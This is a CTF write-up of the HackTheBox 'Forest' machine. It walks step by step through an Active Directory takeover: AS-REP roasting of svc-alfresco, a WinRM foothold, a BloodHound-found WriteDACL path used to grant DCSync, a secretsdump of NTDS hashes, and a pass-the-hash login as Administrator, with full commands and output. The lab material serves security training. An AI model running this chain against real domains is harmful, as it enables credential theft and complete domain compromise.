~/writeups/Forest
Easy Windows Active Directory
Forest.
Easy Windows Active Directory AS-REP Roast WriteDACL DCSync HackTheBox
Easy Windows Active Directory machine covering two fundamental AD attack techniques back to back. Anonymous SMB user enumeration surfaces svc-alfresco, which has Kerberos pre-authentication disabled — AS-REP Roasting captures a crackable hash. WinRM lands a shell. BloodHound maps the path: svc-alfresco is in Account Operators, which can add members to Exchange Windows Permissions, which holds WriteDACL on the domain root. That lets us grant DCSync rights to ourselves and dump the Administrator NT hash. A cleanup task races to revert group membership — chain the commands to beat it.
User Flag
c3617bf3aexxxxxxxxxxxxxxxxxxxxxx
Root Flag
ce23b727cfxxxxxxxxxxxxxxxxxxxxxx
01Reconnaissance

Full port scan returns the standard DC fingerprint. Domain is htb.local, hostname is FOREST. Notably, port 5985 is open — WinRM is available, so evil-winrm will work once we have credentials.

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.2.88 53/tcp open domain Windows DNS 88/tcp open kerberos-sec Windows KDC 389/tcp open ldap Active Directory (Domain: htb.local) 445/tcp open microsoft-ds Windows Server 2016 SMB 5985/tcp open wsman WinRM 636/tcp open tcpwrapped LDAPS 9389/tcp open mc-nmf .NET Message Framing (AD Web Services)
env setup
$ echo "10.129.2.88 htb.local FOREST.htb.local" | sudo tee -a /etc/hosts $ export IP=10.129.2.88 $ export DOMAIN=htb.local
02SMB — User Enumeration via RID Cycling

Null session auth works. Share enumeration is denied, but user enumeration via RID cycling succeeds — 31 accounts are returned. Most are Exchange health mailboxes and system accounts. The interesting ones:

nxc — null auth user dump
$ nxc smb $IP -u '' -p '' --users Administrator svc-alfresco sebastien lucinda andy mark santi
finding: svc-alfresco stands out — the svc- prefix signals a service account. Service accounts are high-value AS-REP/Kerberoast targets because they often have weaker passwords and sometimes have pre-authentication disabled.
03AS-REP Roasting — svc-alfresco

Kerberos pre-authentication forces users to prove they know their password before the DC issues a ticket. When it's disabled on an account, anyone can request an encrypted AS-REP blob for that user — no credentials required — and crack it offline. This is AS-REP Roasting.

GetNPUsers — check user list
$ impacket-GetNPUsers $DOMAIN/ -dc-ip $IP -no-pass -usersfile users.txt $krb5asrep$23$svc-alfresco@HTB.LOCAL:962e26d7618bb19183b48f50486002af$7b1cc078...
common mistake: don't use -m 13100 (Kerberoasting) here. AS-REP hashes start with $krb5asrep$ and require -m 18200. Using the wrong mode gives "Signature unmatched" and no crack.
hashcat — crack AS-REP hash
$ hashcat -m 18200 asrep_hash.txt /usr/share/wordlists/rockyou.txt $krb5asrep$23$svc-alfresco@HTB.LOCAL:...:s3rvice
credential: svc-alfresco:s3rvice — cracked in ~2 seconds.
04Foothold — WinRM Shell
evil-winrm → user flag
$ nxc winrm $IP -u svc-alfresco -p 's3rvice' [+] htb.local\svc-alfresco:s3rvice (Pwn3d!) $ evil-winrm -i $IP -u svc-alfresco -p 's3rvice' *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt c3617bf3aexxxxxxxxxxxxxxxxxxxxxx
05BloodHound — Mapping the Attack Path

BloodHound maps all AD relationships — group memberships, ACL rights, sessions — and highlights attack paths visually. Always run it as a first step after getting any domain credentials.

bloodhound-python — full collection
$ bloodhound-python -u svc-alfresco -p 's3rvice' -d $DOMAIN -ns $IP -c All --zip

Import the zip into BloodHound and run Shortest Path to Domain Admin from svc-alfresco. The path:

attack path (BloodHound output)
svc-alfresco → MemberOf: Service Accounts → MemberOf: Privileged IT Accounts → MemberOf: Account Operators (built-in) → CanAddMember: Exchange Windows Permissions → WriteDACL on: htb.local (domain root) → grant DCSync → dump all hashes → Domain Admin
key insight: Exchange Windows Permissions has WriteDACL on the domain root — a leftover from Exchange installation. WriteDACL lets you rewrite the domain's ACL, including granting yourself DCSync rights. This misconfiguration has been known since the "PrivExchange" research (2018) and still appears in real environments with Exchange history.
06WriteDACL → DCSync

The race: Forest runs a scheduled task that periodically resets Exchange Windows Permissions group membership. If you pause between adding the group and writing the DACL, your membership gets stripped and the DACL write fails with INSUFF_ACCESS_RIGHTS. Chain the commands with && so they fire back-to-back.

Step 1 — from your evil-winrm shell, add svc-alfresco to Exchange Windows Permissions using Account Operators privileges:

evil-winrm — add to group
*Evil-WinRM* PS C:\> net group "Exchange Windows Permissions" svc-alfresco /add /domain The command completed successfully.

Step 2 — immediately from Kali, grant DCSync rights and dump NTDS in one chained command before the cleanup task fires:

dacledit + secretsdump — chained
$ dacledit.py -action 'write' -rights 'DCSync' \ -principal 'svc-alfresco' \ -target-dn 'DC=HTB,DC=LOCAL' \ 'htb.local'/'svc-alfresco':'s3rvice' \ -dc-ip $IP && \ impacket-secretsdump htb.local/svc-alfresco:s3rvice@$IP [*] DACL modified successfully! htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8::: htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
Administrator NT hash: 32693b11e6aa90eb43d32c72a07ceea6. DCSync impersonates a DC replication request — the real DC responds with credentials for any account you ask for, including NT hashes and Kerberos keys, without touching LSASS or any files on disk.
07Root — Pass-the-Hash
evil-winrm PTH → root flag
$ evil-winrm -i $IP -u Administrator -H '32693b11e6aa90eb43d32c72a07ceea6' *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt ce23b727cfxxxxxxxxxxxxxxxxxxxxxx
08Full Attack Chain
attack chain summary
Nmap → DC identified, domain: htb.local, WinRM open on 5985 │ ▼ SMB null auth → RID cycling → 31 accounts dumped → svc-alfresco flagged (service account, svc- prefix) │ ▼ GetNPUsers → svc-alfresco has pre-auth disabled → AS-REP hash hashcat -m 18200 → svc-alfresco:s3rvice │ ▼ evil-winrm → WinRM shell → user.txt ✓ │ ▼ BloodHound → attack path found: svc-alfresco → Account Operators → Exchange Windows Permissions → WriteDACL on htb.local → DCSync │ ▼ net group add → Exchange Windows Permissions membership (cleanup task races — chain next steps immediately) │ ▼ dacledit && secretsdump → DCSync rights written → NTDS dumped → Administrator NT: 32693b11e6aa90eb43d32c72a07ceea6 │ ▼ evil-winrm PTH → Administrator shell → root.txt ✓
key takeaways:
· AS-REP Roasting requires no credentials — pre-auth disabled accounts are exposed to anyone on the network
· AS-REP = -m 18200; Kerberoast = -m 13100 — know the difference before you crack
· Exchange Windows Permissions + WriteDACL on domain root = DCSync path; present in any AD with Exchange history
· WriteDACL on the domain object lets you grant yourself any right, including replication rights
· DCSync leaves no LSASS touch, no file drop — hard to detect without monitoring for rogue replication requests
· Chain exploit steps with && when a cleanup task can revert your changes between commands
· BloodHound should be your first move after getting any domain credentials
← all writeups